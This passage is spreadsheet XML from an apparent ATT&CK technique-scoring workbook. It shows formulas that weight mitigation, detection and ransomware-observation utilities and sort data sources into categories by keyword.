        <f t="array" ref="AI430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD430)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ430" s="37">
        <v>426</v>
      </c>
      <c r="AK430" s="37" t="str" cm="1">
        <f t="array" ref="AK430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD430)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL430" s="37">
        <v>426</v>
      </c>
      <c r="AM430" s="37" t="str" cm="1">
        <f t="array" ref="AM430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD430)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN430" s="37">
        <v>0</v>
      </c>
      <c r="AO430" s="37">
        <v>0</v>
      </c>
      <c r="AP430" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ430" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>205.68245849206349</v>
      </c>
      <c r="AR430" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS430" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT430" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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31" spans="1:47" ht="34">
      <c r="A431" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B431" s="37">
        <f t="shared" si="6"/>
        <v>1011.3884786666667</v>
      </c>
      <c r="C431" s="37" t="s">
        <v>1515</v>
      </c>
      <c r="D431" s="50" t="s">
        <v>1516</v>
      </c>
      <c r="E431" s="37"/>
      <c r="F431" s="37">
        <v>3</v>
      </c>
      <c r="G431" s="37">
        <v>3</v>
      </c>
      <c r="H431" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="I431" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J431" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K431" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L431" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M431" s="37">
        <v>1.5611E-2</v>
      </c>
      <c r="N431" s="56">
        <v>0</v>
      </c>
      <c r="O431" s="56">
        <v>4</v>
      </c>
      <c r="P431" s="56">
        <v>1</v>
      </c>
      <c r="Q431" s="56">
        <v>1</v>
      </c>
      <c r="R431" s="57" t="s">
        <v>1517</v>
      </c>
      <c r="S431" s="57">
        <v>7</v>
      </c>
      <c r="T431" s="57" t="s">
        <v>1518</v>
      </c>
      <c r="U431" s="57">
        <v>19</v>
      </c>
      <c r="V431" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.27619033333333337</v>
      </c>
      <c r="W431" s="37">
        <v>26</v>
      </c>
      <c r="X431" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Y431" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Z431" s="37">
        <v>6</v>
      </c>
      <c r="AA431" s="37">
        <v>0.06</v>
      </c>
      <c r="AB431" s="37">
        <v>0.06</v>
      </c>
      <c r="AC431" s="37"/>
      <c r="AD431" s="50" t="s">
        <v>1519</v>
      </c>
      <c r="AE431" s="37" t="str" cm="1">
        <f t="array" ref="AE431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD431)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF431" s="37">
        <v>427</v>
      </c>
      <c r="AG431" s="37" t="str" cm="1">
        <f t="array" ref="AG431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD431)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH431" s="37">
        <v>427</v>
      </c>
      <c r="AI431" s="37" t="str" cm="1">
        <f t="array" ref="AI431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD431)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ431" s="37">
        <v>427</v>
      </c>
      <c r="AK431" s="37" t="str" cm="1">
        <f t="array" ref="AK431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD431)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL431" s="37">
        <v>427</v>
      </c>
      <c r="AM431" s="37" t="str" cm="1">
        <f t="array" ref="AM431">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD431)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN431" s="37">
        <v>0</v>
      </c>
      <c r="AO431" s="37">
        <v>0</v>
      </c>
      <c r="AP431" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ431" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>337.12949288888893</v>
      </c>
      <c r="AR431" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS431" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT431" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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32" spans="1:47" ht="34">
      <c r="A432" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B432" s="37">
        <f t="shared" si="6"/>
        <v>416.01387785714286</v>
      </c>
      <c r="C432" s="37" t="s">
        <v>1520</v>
      </c>
      <c r="D432" s="50" t="s">
        <v>1516</v>
      </c>
      <c r="E432" s="37" t="s">
        <v>1521</v>
      </c>
      <c r="F432" s="37">
        <v>1</v>
      </c>
      <c r="G432" s="37">
        <v>1</v>
      </c>
      <c r="H432" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I432" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J432" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K432" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L432" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M432" s="37">
        <v>0</v>
      </c>
      <c r="N432" s="56">
        <v>1</v>
      </c>
      <c r="O432" s="56">
        <v>1</v>
      </c>
      <c r="P432" s="56">
        <v>0</v>
      </c>
      <c r="Q432" s="56">
        <v>0</v>
      </c>
      <c r="R432" s="57">
        <v>4.0999999999999996</v>
      </c>
      <c r="S432" s="57">
        <v>1</v>
      </c>
      <c r="T432" s="57" t="s">
        <v>1522</v>
      </c>
      <c r="U432" s="57">
        <v>13</v>
      </c>
      <c r="V432" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14285690476190477</v>
      </c>
      <c r="W432" s="37">
        <v>14</v>
      </c>
      <c r="X432" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y432" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z432" s="37">
        <v>2</v>
      </c>
      <c r="AA432" s="37">
        <v>0.02</v>
      </c>
      <c r="AB432" s="37">
        <v>0.02</v>
      </c>
      <c r="AC432" s="37"/>
      <c r="AD432" s="50" t="s">
        <v>1523</v>
      </c>
      <c r="AE432" s="37" t="str" cm="1">
        <f t="array" ref="AE432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD432)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF432" s="37">
        <v>428</v>
      </c>
      <c r="AG432" s="37" t="str" cm="1">
        <f t="array" ref="AG432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD432)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH432" s="37">
        <v>428</v>
      </c>
      <c r="AI432" s="37" t="str" cm="1">
        <f t="array" ref="AI432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD432)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ432" s="37">
        <v>428</v>
      </c>
      <c r="AK432" s="37" t="str" cm="1">
        <f t="array" ref="AK432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD432)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL432" s="37">
        <v>428</v>
      </c>
      <c r="AM432" s="37" t="str" cm="1">
        <f t="array" ref="AM432">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD432)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN432" s="37">
        <v>0</v>
      </c>
      <c r="AO432" s="37">
        <v>0</v>
      </c>
      <c r="AP432" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ432" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>138.67129261904762</v>
      </c>
      <c r="AR432" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS432" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT432" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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33" spans="1:47" ht="34">
      <c r="A433" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B433" s="37">
        <f t="shared" si="6"/>
        <v>515.09983647619049</v>
      </c>
      <c r="C433" s="37" t="s">
        <v>1524</v>
      </c>
      <c r="D433" s="50" t="s">
        <v>1516</v>
      </c>
      <c r="E433" s="37" t="s">
        <v>1525</v>
      </c>
      <c r="F433" s="37">
        <v>1</v>
      </c>
      <c r="G433" s="37">
        <v>1</v>
      </c>
      <c r="H433" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I433" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J433" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K433" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L433" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M433" s="37">
        <v>0</v>
      </c>
      <c r="N433" s="56">
        <v>0</v>
      </c>
      <c r="O433" s="56">
        <v>0</v>
      </c>
      <c r="P433" s="56">
        <v>0</v>
      </c>
      <c r="Q433" s="56">
        <v>0</v>
      </c>
      <c r="R433" s="57" t="s">
        <v>1517</v>
      </c>
      <c r="S433" s="57">
        <v>7</v>
      </c>
      <c r="T433" s="57" t="s">
        <v>1526</v>
      </c>
      <c r="U433" s="57">
        <v>14</v>
      </c>
      <c r="V433" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999990476190477</v>
      </c>
      <c r="W433" s="37">
        <v>21</v>
      </c>
      <c r="X433" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y433" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z433" s="37">
        <v>0</v>
      </c>
      <c r="AA433" s="37">
        <v>0</v>
      </c>
      <c r="AB433" s="37">
        <v>0</v>
      </c>
      <c r="AC433" s="37"/>
      <c r="AD433" s="50" t="s">
        <v>1523</v>
      </c>
      <c r="AE433" s="37" t="str" cm="1">
        <f t="array" ref="AE433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD433)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF433" s="37">
        <v>429</v>
      </c>
      <c r="AG433" s="37" t="str" cm="1">
        <f t="array" ref="AG433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD433)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH433" s="37">
        <v>429</v>
      </c>
      <c r="AI433" s="37" t="str" cm="1">
        <f t="array" ref="AI433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD433)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ433" s="37">
        <v>429</v>
      </c>
      <c r="AK433" s="37" t="str" cm="1">
        <f t="array" ref="AK433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD433)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL433" s="37">
        <v>429</v>
      </c>
      <c r="AM433" s="37" t="str" cm="1">
        <f t="array" ref="AM433">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD433)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN433" s="37">
        <v>0</v>
      </c>
      <c r="AO433" s="37">
        <v>0</v>
      </c>
      <c r="AP433" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ433" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>171.69994549206351</v>
      </c>
      <c r="AR433" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS433" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT433" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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34" spans="1:47" ht="17">
      <c r="A434" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B434" s="37">
        <f t="shared" si="6"/>
        <v>1975.0523809523811</v>
      </c>
      <c r="C434" s="37" t="s">
        <v>1527</v>
      </c>
      <c r="D434" s="50" t="s">
        <v>1516</v>
      </c>
      <c r="E434" s="37" t="s">
        <v>1528</v>
      </c>
      <c r="F434" s="37">
        <v>1</v>
      </c>
      <c r="G434" s="37">
        <v>1</v>
      </c>
      <c r="H434" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I434" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J434" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K434" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L434" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M434" s="37">
        <v>1</v>
      </c>
      <c r="N434" s="56">
        <v>0</v>
      </c>
      <c r="O434" s="56">
        <v>2</v>
      </c>
      <c r="P434" s="56">
        <v>2</v>
      </c>
      <c r="Q434" s="56">
        <v>6</v>
      </c>
      <c r="R434" s="57"/>
      <c r="S434" s="57"/>
      <c r="T434" s="57"/>
      <c r="U434" s="57"/>
      <c r="V434" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="W434" s="37">
        <v>0</v>
      </c>
      <c r="X434" s="37">
        <v>0</v>
      </c>
      <c r="Y434" s="37">
        <v>0</v>
      </c>
      <c r="Z434" s="37">
        <v>10</v>
      </c>
      <c r="AA434" s="37">
        <v>0.1</v>
      </c>
      <c r="AB434" s="37">
        <v>0.1</v>
      </c>
      <c r="AC434" s="37"/>
      <c r="AD434" s="50" t="s">
        <v>1529</v>
      </c>
      <c r="AE434" s="37" t="str" cm="1">
        <f t="array" ref="AE434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD434)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF434" s="37">
        <v>430</v>
      </c>
      <c r="AG434" s="37" t="str" cm="1">
        <f t="array" ref="AG434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD434)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH434" s="37">
        <v>430</v>
      </c>
      <c r="AI434" s="37" t="str" cm="1">
        <f t="array" ref="AI434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD434)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ434" s="37">
        <v>430</v>
      </c>
      <c r="AK434" s="37" t="str" cm="1">
        <f t="array" ref="AK434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD434)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL434" s="37">
        <v>430</v>
      </c>
      <c r="AM434" s="37" t="str" cm="1">
        <f t="array" ref="AM434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD434)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN434" s="37">
        <v>0</v>
      </c>
      <c r="AO434" s="37"/>
      <c r="AP434" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ434" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>658.35079365079366</v>
      </c>
      <c r="AR434" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS434" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT434" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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35" spans="1:47" ht="34">
      <c r="A435" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B435" s="37">
        <f t="shared" si="6"/>
        <v>1180.7657857142858</v>
      </c>
      <c r="C435" s="37" t="s">
        <v>1530</v>
      </c>
      <c r="D435" s="50" t="s">
        <v>1531</v>
      </c>
      <c r="E435" s="37"/>
      <c r="F435" s="37">
        <v>1</v>
      </c>
      <c r="G435" s="37">
        <v>1</v>
      </c>
      <c r="H435" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I435" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J435" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K435" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L435" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M435" s="37">
        <v>0.37974000000000002</v>
      </c>
      <c r="N435" s="56">
        <v>1</v>
      </c>
      <c r="O435" s="56">
        <v>12</v>
      </c>
      <c r="P435" s="56">
        <v>2</v>
      </c>
      <c r="Q435" s="56">
        <v>6</v>
      </c>
      <c r="R435" s="57" t="s">
        <v>1532</v>
      </c>
      <c r="S435" s="57">
        <v>6</v>
      </c>
      <c r="T435" s="57" t="s">
        <v>1533</v>
      </c>
      <c r="U435" s="57">
        <v>5</v>
      </c>
      <c r="V435" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20476190476190476</v>
      </c>
      <c r="W435" s="37">
        <v>11</v>
      </c>
      <c r="X435" s="37">
        <v>0.2</v>
      </c>
      <c r="Y435" s="37">
        <v>0.2</v>
      </c>
      <c r="Z435" s="37">
        <v>21</v>
      </c>
      <c r="AA435" s="37">
        <v>0.21</v>
      </c>
      <c r="AB435" s="37">
        <v>0.21</v>
      </c>
      <c r="AC435" s="37"/>
      <c r="AD435" s="50" t="s">
        <v>1534</v>
      </c>
      <c r="AE435" s="37" t="str" cm="1">
        <f t="array" ref="AE435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD435)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF435" s="37">
        <v>431</v>
      </c>
      <c r="AG435" s="37" t="str" cm="1">
        <f t="array" ref="AG435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD435)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH435" s="37">
        <v>431</v>
      </c>
      <c r="AI435" s="37" t="str" cm="1">
        <f t="array" ref="AI435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD435)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ435" s="37">
        <v>431</v>
      </c>
      <c r="AK435" s="37" t="str" cm="1">
        <f t="array" ref="AK435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD435)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL435" s="37">
        <v>431</v>
      </c>
      <c r="AM435" s="37" t="str" cm="1">
        <f t="array" ref="AM435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD435)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN435" s="37">
        <v>0</v>
      </c>
      <c r="AO435" s="37">
        <v>2</v>
      </c>
      <c r="AP435" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ435" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>393.58859523809525</v>
      </c>
      <c r="AR435" s="37">
